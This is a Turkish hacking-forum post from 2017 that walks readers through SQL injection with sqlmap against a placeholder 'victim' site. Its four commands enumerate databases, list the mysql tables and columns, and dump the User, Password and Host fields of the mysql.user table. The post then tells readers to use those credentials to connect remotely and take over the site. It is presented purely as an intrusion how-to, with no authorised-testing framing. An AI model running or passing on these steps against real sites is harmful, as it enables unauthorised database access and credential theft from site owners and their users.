Merhaba Ziyaretçi
PowerHack Forumuna Hoşgeldiniz.
Sitemizden daha iyi yararlanabilmeniz için buraya tıklayarak üye olabilirsiniz.

Sqlmap ile mysql database hack

'Hack Dökümanları' forumunda Sagittarius tarafından 2 Aralık 2017 19:50 tarihinde açılan konu

  1. Sagittarius HERKESE MERMİ Onursal Ünvan

    Katılım:
    Cuma
    Mesaj:
    11
    Beğeniler:
    13
    Sqlmap dizinine gelin ve sırasıyla gösterdiğim komutları uygulayın;

    sqlmap.py -u "http://www.hedefsite.com/vuln.php?id=5" --threads=10 --random-agent --dbs



    Komutumuzu vererek sitemizin veritabanı bilgilerini öğreneceğiz. Bize burda lazım olacak olan mysql veritabanıdır.
    Hemen mysql veritabanındaki tabloları çekiyoruz;

    sqlmap.py -u "http://www.hedefsite.com/vuln.php?id=5" --threads=10 --random-agent -D mysql --tables


    ve ardından User tablomuzdaki kolonları çekiyoruz;



    sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user --columns


    Kolonlar geldikten sonra bize gerekli olanları yani User, Password ve Host kolonlarındaki bilgileri çekiyoruz.

    sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user -C User,Password,Host --dump

    ve bilgiler elimizde, bu bilgiler ile linux da remote mysql bağlantısı yaparak siteyi hackleyebilirsiniz.
     

Bu Sayfayı Paylaş